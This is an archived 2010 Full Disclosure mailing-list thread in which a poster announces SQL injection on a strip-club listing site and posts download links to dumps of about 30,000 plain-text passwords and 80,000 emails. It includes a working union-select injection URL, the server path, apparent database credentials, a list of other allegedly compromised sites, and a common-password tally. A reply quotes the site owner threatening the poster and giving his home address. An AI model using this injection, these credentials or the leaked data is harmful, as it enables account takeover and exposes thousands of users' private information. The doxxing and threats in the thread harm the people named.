Full Disclosure mailing list archives
Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list
From: Ben <iluv2cane () gmail com>
Date: Wed, 8 Sep 2010 22:10:12 +0000
*From:* "www.tuscl.net" <tuscl.founder () gmail com> *To:* auto595158 () hushmail com, iluv2cane () gmail com, benhuoh () gmail com, benhu () physics uakron edu *Date:* Wed, 08 Sep 2010 19:01:24 +0000 Just received this email from the owner of the site: Ben How 'bout I send a couple of strippers over to your condo there in Akron so you can cane them. You're still at 1381 Waters Edge, right? Then maybe I will blast out an email to all your colleagues there at the physics department of the University of Akron with this little jewel... *I have a suggestion for a Mood Pictures movie whic would be called something like "Crime Deterrent Video for Girls." ... * Ah, hell, Ben, you know the plot... but what I really like is the last line of the email: *"I think it is a nice psychological touch to imagine a class of 14 or 15 year-old girls being made to see the canings shown in this video. " * I'm sure the FBI will be all over that. Tell you what Mr. Ben Yu-Kuang Hu, let's make a deal. You clean up the mess you made, stay the hell off my site, and I will forget this little escapade ever happened. Deal? ----------------------------------------------- So first off, I should report your ass to the FBI for prostitution. Second, this email account I signed up with, happened to contain the same password for your site as it did it's email. So to hide myself further and cause you to run around chasing my proxies and pin the blame on some retard who is obsessed over BDSM. Third, Ill fix your website, give me the root password :D On Fri, Sep 3, 2010 at 8:37 PM, Ben <iluv2cane () gmail com> wrote:
worked in firefox.... if you see the title bar stating 3,8 thats the union select ;) also per this page: http://www.tuscl.net/contact-login.php Recently we lost a week's worth of user data. We believe it was the work of hackers, and have tightened our security measures. On Fri, Sep 3, 2010 at 8:32 PM, Jhfjjf Hfdsjj <taser3000 () yahoo com> wrote:Well, one thing I will point out is that the link you submitted for the actual SQL injection doesnt seem to work. Either they fixed it or you messed up the link. ------------------------------ *From:* Ben <iluv2cane () gmail com> *To:* full-disclosure () lists grok org uk *Sent:* Fri, September 3, 2010 11:09:04 AM *Subject:* [Full-disclosure] Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list I found many sql injections on Tuscl.net (The ultimate strip club list) I tried notifying the site, no response. The server is ran on a vmware. So anything that is done to it is restored, apon reboot. This is a dump of usernames passwords and emails for the site. They are in plain text. I have removed records that had the system generated password that the user never changed. http://tinyurl.com/397rzqs http://bit.ly/bkVnPY http://is.gd/eTqna http://jump.fm/FOJRO http://www.mediafire.com/?l6i1vd25il61a6b http://www.megafileupload.com/en/file/265174/users-sql-zip.html http://www.4shared.com/file/w0qqRyDf/userssql.html http://rapidshare.com/files/416858410/users.sql.zip http://rapidshare.com/files/416860069/users.sql.zip http://www.speedyshare.com/files/24097837/users.sql.zip http://uploading.com/files/e1741mm9/users.sql.zip/ http://bit.ly/cFvd8B http://is.gd/eTsn5 http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 Common Passwords and the number of accounts that shared them password - 269 123456 - 173 tuscl - 84 stripper - 67 qwerty - 62 12345 - 49 12345678 - 47 1234 - 42 baseball - 36 monkey - 36 princess - 34 stripclub - 33 strip - 32 jennifer - 32 abc123 - 32 mustang - 31 pussy - 29 lapdance - 27 andrew - 27 jmh1978 - 27 letmein - 27 fuckyou - 27 696969 - 27 michelle - 26 harley - 25 dallas - 25 111111 - 25 shadow - 24 corvette - 24 trustno1 - 24 sunshine - 22 dragon - 21 jordan - 21 love - 21 butthead - 20 batman - 20 danielle - 20 buster - 20 password1 - 20 hello - 20 biteme - 20 gaydar - 20 Michael - 19 george - 19 hockey - 19 ginger - 19 6969 - 19 Bandit - 19 lasvegas - 18 taylor - 18 tigger - 18 yankees - 18 chicago - 18 fucker - 18 blahblah - 17 football - 17 1escobar2 - 17 1111 - 17 Jessica - 17 123456789 - 16 testing - 16 phoenix - 16 badboy - 16 gemini - 16 ranger - 16 heather - 15 gateway - 15 secret - 15 welcome - 15 654321 - 15 aaaaaa - 15 tennis - 15 asshole - 15 maggie - 14 pepper - 14 charlie - 14 golfer - 14 strippers - 14 redskins - 14 summer - 14 peanut - 14 chicken - 13 jeremy - 13 hunter - 13 m0ntlure - 13 fuckoff - 13 dancer - 13 bitch - 13 lucky - 13 whatever - 13 killer - 13 prince - 13 robert - 13 orange - 13 thomas - 13 hawaii - 12 redsox - 12 tiger - 12 titties - 12 gators - 12 Password - cnt florida - 12 kitten - 12 austin - 12 merlin - 12 canada - 12 diamond - 12 boston - 12 master - 12 yellow - 12 falcon - 12 jasmine - 12 1234567 - 12 cookie - 12 superman - 12 midnight - 12 blowme - 12 jackass - 12 sparky - 12 peekaboo - 11 doctor - 11 brandy - 11 8675309 - 11 madison - 11 braves - 11 brooklyn - 11 money - 11 anthony - 11 samantha - 11 ashley - 11 lucky1 - 11 amanda - 11 booboo - 11 SOCCER - 11 tarheels - 11 bigdog - 11 pookie - 11 private - 11 tiffany - 11 martin - 11 silver - 11 lakers - 10 eatme - 10 junior - 10 platinum - 10 sex - 10 iloveyou - 10 nicole - 10 vegas - 10 wolfpack - 10 55555555 - 10 barney - 10 melissa - 10 molly - 10 passw0rd - 10 sexy - 10 nascar - 10 dietcoke - 10 chris - 10 boomer - 10 test123 - 10 johnny - 10 red123 - 10 asdfgh - 10 ncc1701 - 10 314159 - 10 internet - 10 jackson - 10 computer - 10 peaches - 10 horny - 10 sierra - 10 rush2112 - 10 Here is the complete list of email addresses registered. The site had no validated so, I am sure, some are fake. http://www.tuscl.net/emails.zip http://rapidshare.com/files/416871314/emails.zip http://www.mediafire.com/?67rzfbvmyr1c492 http://www.speedyshare.com/files/24098846/emails.zip http://www.megafileupload.com/en/file/265210/emails-zip.html The path to the working directory is: /home/httpd/vhosts/ tuscl.net/httpdocs/ The SQL information is "localhost" - "tuscl" - "szg4wpl9" Also if you want to look at all the nudey photos uploaded here is where they are http://www.tuscl.net/pictures/ There are other sites that could have been comprimised as well: vanjonesthinksimanasshole.com tuscl.com onerun.com ecampguide.com (contains another 1200 plain text passwords) troopedge.com Well have fun! Owner or media if you want get ahold of me: auto595158 () hushmail com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Ben (Sep 03)
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Jhfjjf Hfdsjj (Sep 04)
- Message not available
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Ben (Sep 04)
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Ben (Sep 08)
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Benji (Sep 08)
- Message not available
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Jhfjjf Hfdsjj (Sep 04)